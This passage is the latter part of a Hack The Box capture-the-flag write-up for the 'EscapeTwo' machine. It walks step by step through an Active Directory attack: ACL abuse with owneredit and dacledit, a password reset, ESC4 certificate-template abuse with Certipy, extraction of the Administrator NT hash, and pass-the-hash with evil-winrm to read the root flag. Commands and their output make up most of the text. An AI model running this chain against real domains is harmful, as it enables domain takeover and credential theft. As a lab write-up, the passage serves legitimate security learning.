└──╼ #bloodhound-python --domain sequel.htb -c all -u ryan -p 'WqSZAF6CysDQbGb3' -dc dc01.sequel.htb -ns 10.10.11.51 --dns-tcp
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.sequel.htb
INFO: Done in 00M 07S
The user account ryan has First Degree Object Control on the user account ca_svc. The user account ryan has abusable ACE permissions on the object ca_svc. In other words, we can change the password of the ca_svc user account an maybe abuse the privileges of this user account.
We already know that there is a ca_svc user and that ryan has object control over this account. It is likely that the Certificate Authority (CA) role is installed, and if so, we can escalate privileges through common misconfigurations in CA. Let’s check that with PowerShell.
1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\ryan\Documents> get-windowsfeature | ?{$_.installstate -eq "installed"}
Display Name Name Install State
------------ ---- -------------
[X] Active Directory Certificate Services AD-Certificate Installed
[X] Certification Authority ADCS-Cert-Authority Installed
[X] Active Directory Domain Services AD-Domain-Services Installed
[X] DNS Server DNS Installed
[X] File and Storage Services FileAndStorage-Services Installed
...
The role is installed! We can now misuse the privileges to transfer the ownership of the ca_svc object to ryan and change the password for ca_svc. Then, we can check with that user account to see if there are any vulnerable certificate templates. First, add ryan as the owner.
1
2
3
4
5
6
7
8
9
(impacket-venv) ┌─[✗]─[root@parrot]─[/home/johnd/htb/machines/escapetwo/impacket/examples]
└──╼ #python3 owneredit.py -action write -new-owner ryan -target ca_svc 'sequel/ryan:WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51
Impacket v0.13.0.dev0+20250530.173014.ff8c200f - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!
Second, we can grant ryan full control over the user account ca_svc.
1
2
3
4
5
6
(impacket-venv) ┌─[✗]─[root@parrot]─[/home/johnd/htb/machines/escapetwo/impacket/examples]
└──╼ #dacledit.py -action write -rights FullControl -principal ryan -target ca_svc 'sequel/ryan:WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51
Impacket v0.13.0.dev0+20250530.173014.ff8c200f - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250604-224554.bak
[*] DACL modified successfully!
Then, we change the password of the user account ca_svc.
1
Evil-WinRM* PS C:\Users\ryan\Documents> Set-ADAccountPassword -Identity 'ca_svc' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force)
With the user of certipy we can use ca_svc to check if there are any vulnerable certificate templates.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
(certipy-venv) ┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #certipy find -u ca_svc -p 'Password123!' -target 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Saved BloodHound data to '20250604225348_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250604225348_Certipy.txt'
[*] Saved JSON output to '20250604225348_Certipy.json'
Let’s read the output.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
(certipy-venv) ┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #cat 20250604225348_Certipy.txt
...
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
The template DunderMifflinAuthentication is vulnerable to the so-called ESC4 attack. The user account ca_svc is added to the Security Group Cert Publishers, which is the default setting in Windows when you install the Certificate Authority role. The configured service account for this role is automatically added to this group, which has full control over the certificate template DunderMifflinAuthentication. Since we control this user account, we can exploit this privilege for privilege escalation and obtain the hash for the Administrator account.
Let’s modify the template.
1
2
3
4
5
6
7
(certipy-venv) ┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #certipy template -u ca_svc -p 'Password123!' -template DunderMifflinAuthentication -target 10.10.11.51 -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
We can now request the Domain Admin certificate using the modified DunderMifflinAuthentication template.
1
2
3
4
5
6
7
8
9
(certipy-venv) ┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #certipy req -ca sequel-DC01-CA -u ca_svc -p 'Password123!` -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -target dc01.sequel.htb -upn administrator@sequelhtb Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Once we have obtained the domain admin certificate, we can request the password hash to gain acess as domain admin.
1
2
3
4
5
6
7
8
9
10
(certipy-venv) ┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #certipy auth -pfx administrator.pfx -domain sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
With a pass-the-hash with evil-winrm we can root this machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #evil-winrm -u administrator -i 10.10.11.51 -H 7a8d4e04986afa8ed4060f75e5a0b3ff
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami; hostname
sequel\administrator
DC01
Read the root.txt file to get the flag.
1
2
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
fe4a821d551e0c9707dd34e3717f35d5
Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? I have learned something new when rooting this machine. Everytime we all learn new stuff when we are hacking. Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!
Happy Hacking :-)